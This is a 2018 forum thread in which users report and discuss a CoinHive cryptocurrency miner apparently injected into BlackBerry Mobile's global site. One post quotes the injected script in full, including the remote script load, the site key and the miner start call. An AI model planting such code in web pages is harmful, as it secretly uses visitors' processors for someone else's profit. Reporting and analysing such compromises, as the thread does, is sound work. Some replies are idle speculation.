Built for Business - Learn more about BlackBerry KEY2
  1. poopchute's Avatar
    Before you assume it's my browser that is compromised have a look for yourself, this has been verified by various people who have the same issue.
    Look at the top of the source @ www.blackberrymobile.com/en/ and see that coinhive is injected into the page at the very top.
    Last edited by poopchute; 01-02-18 at 10:11 PM.
    01-02-18 05:43 PM
  2. thurask's Avatar
    Attempting to view source on just the .com site redirects me to .com/ca, but this is with Chrome Incognito, cache flushed and my Pi-Hole disabled:

    Why does the official BlackBerry Mobile site contain CoinHive script?-there_is_no_coinhive.png

    Could you post yours to compare?
    01-02-18 08:24 PM
  3. Invictus0's Avatar
    Attempting to view source on just the .com site redirects me to .com/ca, but this is with Chrome Incognito, cache flushed and my Pi-Hole disabled:

    Click image for larger version. 

Name:	there_is_no_coinhive.png 
Views:	176 
Size:	237.8 KB 
ID:	432880

    Could you post yours to compare?
    I can't find anything either but I assume OP is referring to this,

    https://www.reddit.com/r/blackberry/...s_coinhive_to/
    xandros9 likes this.
    01-02-18 09:02 PM
  4. poopchute's Avatar
    The CA site doesn't have the coinhive code added it seems, I just verified. As for the non-CA url, I have verified this with 2 other people using 3 different computers that the miner exists on their main site. Initially pointed out by the user cryptocripples on /r/security.

    It seems like none of the other sites are affected, only the global site which can be found at https://www.blackberrymobile.com/en/.
    Last edited by poopchute; 01-02-18 at 09:32 PM.
    xandros9 likes this.
    01-02-18 09:08 PM
  5. BigBadWulf's Avatar
    From my reading, the script:

    <script src='https://coinhive.com/lib/coinhive.min.js'></script>
    <script>
    var miner = new CoinHive.Anonymous('9KNyPFbDqJesaSxBLcQoJZX6PgXN1l d0',{throttle: 0.5});
    miner.start();
    </script><script src='https://coinhive.com/lib/coinhive.min.js'></script>
    <script>
    var miner = new CoinHive.Anonymous('9KNyPFbDqJesaSxBLcQoJZX6PgXN1l d0',{throttle: 0.5});
    miner.start();
    </script>
    Being redirected through "Anonymous" is a potentially malicious, unauthorized injection.
    01-02-18 09:44 PM
  6. poopchute's Avatar
    According to the coinhive documentation, using anonymous vs user reflects who gets credit for finding a hash so that doesn't really make it that much more suspicious as I assume a lot of people would run it like that (unless they wan't to credit specific users of their site).
    I do indeed think though that it might be a malicious, unauthorized injection. Maybe an account on the global site got compromised or a content manager thought he could get some easy money by adding a miner to a major brand site. Who knows. Assumptions for now, I'm curious if we'll see an official statement about it.
    BigBadWulf likes this.
    01-02-18 10:08 PM
  7. BigBadWulf's Avatar
    I'm curious if we'll see an official statement about it
    I'd be surprised, but you never know. Whether or not they were aware, they are now


    PS - Title changed to remove assumptions
    01-02-18 10:12 PM
  8. thurask's Avatar
    01-02-18 11:07 PM
  9. thurask's Avatar
    I do indeed think though that it might be a malicious, unauthorized injection. Maybe an account on the global site got compromised or a content manager thought he could get some easy money by adding a miner to a major brand site. Who knows. Assumptions for now, I'm curious if we'll see an official statement about it.
    Maybe sales aren't as brisk as they thought they would be.
    01-02-18 11:54 PM
  10. Bayu Sanjaya's Avatar
    New strategy to get money I think. blackberry already compromised privacy with android to get more money. Why not for this.
    Last edited by Bayu Sanjaya; 01-03-18 at 08:45 AM. Reason: Typo
    01-03-18 08:44 AM
  11. johnny_bravo72's Avatar
    New strategy to get money I think. blackberry already compromised privacy with android to get more money. Why not for this.
    I guess you got yourself a tinfoil hat last Christmas. 😵
    01-03-18 09:02 AM
  12. Bla1ze's Avatar
    Maybe sales aren't as brisk as they thought they would be.
    Still requires people to visit the site though. Plus, as you saw, most will get bounced from the 'main' site. In any case, looks like the site was compromised, according to Coin Hive - https://www.reddit.com/r/blackberry/...ve_to/ds4p4rt/

    Why does the official BlackBerry Mobile site contain CoinHive script?-screenshot-2018-01-03-11.28.29.png
    BigBadWulf likes this.
    01-03-18 09:22 AM
  13. ToniCipriani's Avatar
    Still requires people to visit the site though. Plus, as you saw, most will get bounced from the 'main' site. In any case, looks like the site was compromised, according to Coin Hive - https://www.reddit.com/r/blackberry/...ve_to/ds4p4rt/

    Click image for larger version. 

Name:	Screenshot 2018-01-03 11.28.29.png 
Views:	122 
Size:	38.6 KB 
ID:	432895
    Why are they using a "web shop service" if that site isn't even selling anything?
    01-03-18 09:51 AM
  14. Bla1ze's Avatar
    Why are they using a "web shop service" if that site isn't even selling anything?
    Pretty sure the BlackBerry Mobile EU store is also ran off the same site/servers, but can't tell right now since it's all redirecting for what I assume is the cleanup crew coming in. Also, is it really surprising if they did have a store there for no reason? On my own site, I have a ton of things set up that are never used that could be exploited if people went looking. Wouldn't exactly be shocking to know a store was there and ready to roll at any given moment.
    01-03-18 10:02 AM
  15. anon(8679041)'s Avatar
    Firefox Quantum 57.0.3 (not incognito)
    Why does the official BlackBerry Mobile site contain CoinHive script?-unt12e12itled.png
    01-04-18 07:50 AM
  16. A Noise Annoys's Avatar
    I'm having issues with the Canadian site, it doesn't matter what browser I use I'm blocked but not by my security software but by the browsers themselves. On Edge it gives you the option of going to the site anyway but it redirects to a 404 page at ca.blackberry.com. Very strange:

    Why does the official BlackBerry Mobile site contain CoinHive script?-img_20180103_142907.jpg

    Why does the official BlackBerry Mobile site contain CoinHive script?-img_20180103_143204.jpg

    Now when I either type the address blackberrymobile.com/ca/ manually or use the Google link my browsers don't even try to connect and just go straight to BlackBerry's (ie RIM's) 404 page.
    01-04-18 10:29 AM
  17. gizmo21's Avatar
    Hhm it seems BBM can't even secure their webservers.
    anon(8679041) likes this.
    01-04-18 06:16 PM
  18. Bayu Sanjaya's Avatar
    Hhm it seems BBM can't even secure their webservers.
    Blackberry web server must be using android web server. Blackberry should use bb10 to make it secure.
    01-04-18 08:25 PM

Similar Threads

  1. My life so far after switching to BlackBerry Android
    By silversmith75 in forum BlackBerry Android OS
    Replies: 22
    Last Post: 02-25-18, 09:30 AM
  2. Can the KEYone be made to function like Passport with full case
    By EndRacism in forum BlackBerry KEYone
    Replies: 17
    Last Post: 02-15-18, 11:27 PM
  3. Why is my BMW not able to read USB. .
    By Carlenglish9 in forum BlackBerry DTEK60
    Replies: 8
    Last Post: 01-06-18, 01:02 PM
  4. What do I need to do when switching BlackBerrys?
    By Shadowbolt in forum General BlackBerry Discussion
    Replies: 4
    Last Post: 01-02-18, 10:40 AM
LINK TO POST COPIED TO CLIPBOARD